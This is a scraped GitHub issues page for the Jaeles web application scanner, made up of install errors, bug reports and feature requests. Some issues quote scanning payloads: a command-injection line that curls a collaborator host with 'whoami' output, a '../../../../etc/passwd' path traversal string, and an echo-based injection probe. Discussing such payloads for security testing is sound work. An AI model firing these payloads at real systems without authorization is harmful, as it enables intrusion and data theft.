jaeles-project / jaeles Goto Github PK
View Code? Open in Web Editor NEWThe Swiss Army knife for automated Web Application Testing
Home Page: https://jaeles-project.github.io/
License: MIT License
The Swiss Army knife for automated Web Application Testing
Home Page: https://jaeles-project.github.io/
License: MIT License
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
What should i do ?
Command used :
(1) jaeles server --verbose
(2) The JWT Token has been saved in ~/.jaeles-burp/config.json.
(3) Login UI with the creds.
Procedure to produce :
When pressing the "Test Connection" button in Burp Suite Community Edition, the jaeles server produced "401" error. Meanwhile, the "Send to Endpoint" does not work too.
error:
Import to external Jaeles ...
<urllib2.Request instance at 0x6>
why ?
thanks @j3ssie
Thank you for this awesome project at first!
I recently used Jaeles with the burp plugin, so I started Jaeles in server mode.
Unfortunately, I have noticed that when supplying an additional value of a parameter defined in a signature, it wont be replaced by the Jaeles API.
For example, my parameter in the signature looks as follows:
variables:
- dest: |
example.com
I call Jaeles like :
jaeles server -v -s "my-signature.yaml" -p 'dest=xxx.burpcollaborator.net' --proxy http://127.0.0.1:8080
Following test payload is in the signature:
payloads:
- '\"curl http://{{.dest}}/.testing/?vuln=16?user=\\\`whoami\\\`\"'
But when observing the requests Jaeles makes through burp, I see that the parameter value of "dest" is not replaced with "xxx.burpcollaborator.net".
It still sets the value as initially defined:
...http://example.com/.testing/?vuln=16?user=...
First all i ❤❤❤ your tools man.
When generating output in html it would be nice to view the file in the browser other than it downloading since it has no file extension.
When I try to use Generator with some headers, the payload don't work. For example:
# info to search robots.txt
id: test
type: fuzz
info:
name: Robots
risk: Low
payloads:
- 'robots.txt'
- 'teste'
requests:
- generators:
- Header("{{.payload}}", "Arbitraty")
When I use this template, the jaeles will send 2 requests using the header "Arbitraty" but with the same payload, which is the last payload that I set (in this case: teste)
However, if I change the Arbitraty word for Referer, it will work normally. This problem doesn't occurs only with some headers.
Hello, I would like to know how to add a new signature manually since through the UI a 404 error returns, please and thank you
Hello, I would like to ask, how to do scan on a web app that requires login/ authentication?
BTW, its Laravel 8/ 9 web app.
Thank you.
Web UI doesn't start, gives error,
{"code":401,"message":"cookie token is empty"}
Trying to execute the CLI:
$ jaeles scan -u https://localhost:8080
[Error] No signature loaded
Prior to execution, jaeles config -a init and -a update were ran to ensure signatures were available.
Is there something else to do?
Thanks!
Getting this error while running any command :
Can't connect to DB at /root/.jaeles/sqlite3.db
Please, add HTTP/2 Support requests
Hi. When compiling the latest version of the code, I get the following error:
# github.com/appleboy/gin-jwt
src/github.com/appleboy/gin-jwt/auth_jwt.go:457:14: not enough arguments in call to c.SetCookie
have (string, string, int, string, string, bool, bool)
want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:475:14: not enough arguments in call to c.SetCookie
have (string, string, number, string, string, bool, bool)
want (string, string, int, string, string, http.SameSite, bool, bool)
src/github.com/appleboy/gin-jwt/auth_jwt.go:540:14: not enough arguments in call to c.SetCookie
have (string, string, int, string, string, bool, bool)
want (string, string, int, string, string, http.SameSite, bool, bool)
It seems related to this issue in the gin-jwt project: appleboy/gin-jwt#230. Some users have solved the issue by implementing go modules.
Regards.
Command:
./jaeles scan -s templates/ -u http://testphp.vulnweb.com/listproducts.php?cat=2 -c 50 --no-db
Error (if using --no-db
):
Jaeles beta v0.14 by @j3ssiejjj
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0xb0 pc=0xc4a966]
goroutine 1 [running]:
github.com/jinzhu/gorm.(*DB).clone(0x0, 0x4ebfa4)
/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:853 +0x26
github.com/jinzhu/gorm.(*DB).NewScope(0x0, 0x111fb20, 0xc00012c000, 0xc0004182d0)
/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:204 +0x2f
github.com/jinzhu/gorm.(*DB).Create(0x0, 0x111fb20, 0xc00012c000, 0x1)
/go/pkg/mod/github.com/jinzhu/[email protected]/main.go:482 +0x43
github.com/jaeles-project/jaeles/database.NewScan(0xc0004cc7e0, 0x12, 0x13435a3, 0x1a, 0xc0004ccac0, 0x1b, 0xc0004ccae0, 0x1c, 0xc0004ccb00, 0x1d, ...)
/go/src/github.com/jaeles-project/jaeles/database/scan.go:37 +0x33e
github.com/jaeles-project/jaeles/cmd.SelectSign()
/go/src/github.com/jaeles-project/jaeles/cmd/root.go:198 +0x46a
github.com/jaeles-project/jaeles/cmd.runScan(0xc000470580, 0xc0004040e0, 0x0, 0x7, 0x0, 0x0)
/go/src/github.com/jaeles-project/jaeles/cmd/scan.go:36 +0x42
github.com/spf13/cobra.(*Command).execute(0xc000470580, 0xc000404070, 0x7, 0x7, 0xc000470580, 0xc000404070)
/go/pkg/mod/github.com/spf13/[email protected]/command.go:842 +0x460
github.com/spf13/cobra.(*Command).ExecuteC(0x1fbff40, 0x44813a, 0x1fd5680, 0xc000000180)
/go/pkg/mod/github.com/spf13/[email protected]/command.go:950 +0x349
github.com/spf13/cobra.(*Command).Execute(...)
/go/pkg/mod/github.com/spf13/[email protected]/command.go:887
github.com/jaeles-project/jaeles/cmd.Execute()
/go/src/github.com/jaeles-project/jaeles/cmd/root.go:33 +0x31
main.main()
/go/src/github.com/jaeles-project/jaeles/main.go:6 +0x20
I'm getting installation error
root@wind:~# go install github.com/jaeles-project/jaeles@latest
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
Actually This Tool Is So Great , But In type: fuzz There Is One Feature Missing
It Is Fuzz Cookie Header , This Tool Give Us To Replace Value Of Header Name But Let e.g.
Cookie Header Of The Origin Request Like This
Cookie: session=1; id=22; lang=en
So It Is Possible To Fuzz Cookie Here Like Fuzzing Body e.g. Can You Add Something Like That
id: Cookie-Fuzz
info:
name: Fuzz Cookie Headers
risk: Critical
type: fuzz
payloads:
- '../../../../etc/passwd'
requests:
- generators:
- Header-Fuzz("{{.payload}}", "Cookie")
So Here Header-Fuzz Generate Three Requests
Cookie: session=../../../../etc/passwd; id=22; lang=en
Cookie: session=1; id=../../../../etc/passwd; lang=en
Cookie: session=1; id=22; lang=../../../../etc/passwd
So Can This Happen ?
Hello, what is the syntax to use raw request option?
jaeles scan -r request.txt ?
Jaeles has a lot of feature but one feature is missing that is connecting many template like nuclei. I use nuclei only for that feature. But I really love it jaeles has that same feature too
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
I use the jaeles as the following command ;-
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2 --proxy http://127.0.0.1:8080
IMMEDIATELY CPU SPIKES TO 100% after this and my pc fan running like a helicopter
jaeles scan -c 50 -s '/home/mydirectory/jaeles-signatures/sensitive/.*' -U example_hosts.txt -L 2
It also cause the CPU spikes to 100% later on and keep it not less than 50 % while the scan running . And further there was not any more internet connection in my home router. To have the connection again I have to end the process of jaeles and restart my router.
First problem I need helps if possible.
For connection problem it will solve if there is an option to add resolver files of flag like -r resolvers.txt as well the rate limit hopefully. jaeles is a very nice tool and always thanks for providing it.
Hello @j3ssie howare you?
Today I try test with my signature for xss
https://github.com/ghsec/ghsec-jaeles-signatures/blob/master/Dom-xss.yaml
[0006] DEBUG Detection: HasPopUp() -- false
[0006] ERROR chrome failed to start:
[46504:46504:0312/231756.623137:ERROR:content_main_runner_impl.cc(325)] --no-sandbox should be used together with --no--zygote
What's wrong? is this error jaeles or chrome?
Add an -pbar option similar to nuclei to show the total number of packets being sent
As we can see in the docs:
Header() and Body() have same usage of Query() generator.
- Query("{{.payload}}", "{{.name}}")
works fine, but
- Body("{{.payload}}", "{{.name}}")
just ignored.
I tried to set the method to POST, but anyways it doesn't work
My config is -
id: ci-fuzz-01
info:
name: Command Injection Reflection
risk: High
payloads:
- 'echo TJEGSE$((2314+6548321))$(echo TJEGSE)TJEGSE'
requests:
- detections:
- StringSearch("response", "6550635") && (StringCount("response", "6550635") > StringCount("oresponse",
"6550635"))
generators:
- Body("{{.payload}}", "{{.name}}")
type: fuzz
variables:
- name: 'cmd
'
Send the request from burp to Jaeles. And use jaeles to brute force password or fuzz directories.
Why we need to do that?
Hey Guys,
Been playing with jaeles for a few days now and this is what I did to get it to work:
GO111MODULE=on go install github.com/jaeles-project/jaeles@latest
, the binary is inside the go folder. I have not tested this so unsure how it works.jaeles config init
you get an error, delete the folder .jaeles
and try again, you should se the signatures being downloadedOtherwise, the tool seems to work like charm. I hope this helps.
i see the "My introduction slide about Jaeles" link , but its not found.
Pls help me with , how to get started with this.
Apologies for opening a new issue, but the previous one #12 was closed before I had a chance to test the changes.
After pulling the new Jaeles and running a config -a update, still says "No signatures loaded".
Is there a specific directory or environment in which Jaeles should be run? For some reason it's not locating signatures when running a simple scan command.
I did by
jaeles report -o mysavedscanfolder
But it does Nothing to save `
wget https://github.com/jaeles-project/jaeles/releases/download/beta-v0.17/jaeles-v0.17-darwin.zip
unzip jaeles-v0.17-darwin.zip
git clone --depth=1 https://github.com/jaeles-project/jaeles-signatures ./jaeles-signatures/
./jaeles config -a reload --signDir ./jaeles-signatures/
./jaeles server
POST /auth/login HTTP/1.1
Content-Type: application/json
User-Agent: Jaeles Scanner
Host: 127.0.0.1:5000
Content-Length: 54
Connection: close
{
"username": "jaeles",
"password": "your_password_here"
}
https://github.com/jaeles-project/jaeles-plugins
refer. https://jaeles-project.github.io/installation/burp-integration/
Hi,
Jaeles is most powerful tool, I love it. But can I use burp collaborator in script. Like BurpBounty Burp plugin do. Is there anyway I can give {BC} and it replace by burp collaborator address?
I am installing jaeles in VPS and facing error when installing using GO. I run go install github.com/jaeles-project/jaeles@latest
and getting following error after some installation.
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
I tried:
go install github.com/jaeles-project/jaeles@latest
and it failed with error:
sqlite3-binding.c: In function ‘sqlite3SelectNew’:
sqlite3-binding.c:129019:10: warning: function may return address of local variable [-Wreturn-local-addr]
129019 | return pNew;
| ^~~~
sqlite3-binding.c:128979:10: note: declared here
128979 | Select standin;
| ^~~~~~~
then I tried:
GO111MODULE=on go install github.com/jaeles-project/jaeles@latest
and I got the same error.
I tried the docker image but is not working, tried to get a shell into it to try to fix the docker image but bin/bash is not present. anyone knows how to successfully install Jaeles? am I missing something?
the only ones that are working are the pre-compiled versions.
Hi
I'm finding only "info" level vulns, probably due to the lack of a rate-limiting feature to throttle the number of requests per second. Is there an option to do this that I may not have perceived yet?
Regards
can you also add option to add resolvers file
The repeat option on yaml template is not working. I tried to repeat the request and no success
After the basic signature is scanned, jaeles does not stop running or print the vulnerability results of the scan, but still sending just four packets of HEAD, POST, GET, PATCH, the requested url is the same, just like DDOS .
I have executed reload --signDir jaeles-signatures, the command used when scanning is
./jaeles-v0.9 scan -u https://seaii-blog.com -v.
My operating system is osx.
I am getting error on running
λ jaeles scan -u http://brutelogic.com.br/xss.php -s Dom-xss.yaml
test rule:
id: test
info:
name: Test
risk: Critical
type: fuzz
payloads:
- 'test'
requests:
- generators:
- Query("[[.original]]{{.payload}}")
detections:
- OriginResponseTime() > 0
jaeles scan -s test.yaml -u https://example.com\?param\=1 -v --debug
Jaeles beta v0.7 by @j3ssiejjj
[0000] INFO Load config from: /root/.jaeles/config.yaml
[0000] INFO Summary output: out/jaeles-summary.txt
[0000] INFO Signatures Loaded: 1
[0000] INFO Signature Loaded: test.yaml
[0000] INFO Start Scan with ID: 61343531626561382d376436302d313165612d613733392d393630303030313263303833
[0000] INFO Input Loaded: 1
[0000] DEBUG Checking backround task
[0000] DEBUG Generator: Query("[[.original]]test")
[0000] DEBUG injectedString: [[.original]]test
[0000] DEBUG paramName: undefined
[0000] DEBUG New Parsed Reuqest: 1
[Sent] GET https://example.com?param=1test 200 OK HTTP/1.1 0.42473274
[0000] DEBUG Detection: OriginResponseTime() > 0
Hello,
I might have missed something but it looks like we can't modify the original parameters names by using generators.
For example: What I would like to automate:
hxxps://test.com/index.php?test1=aaa&test2=aaaa -> hxxps://test.com/index.php?test1[]=aaa&test2[]=aaaa
Did I missed something or this would be an awesome functionnality to add ? 😁
Regards,
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory:
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool and improve its referencing.
The badge shows to your community that your are inventoried. It looks good but also shows you care about your project, that your tool is referenced.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like that , but there are several styles available.
If you want to thank us, you can help make our open project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care. Else you can close this issue.
Hello is posible to mount the web UI and the rest in a web-server and pass the burpsuite traffic from my machine?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.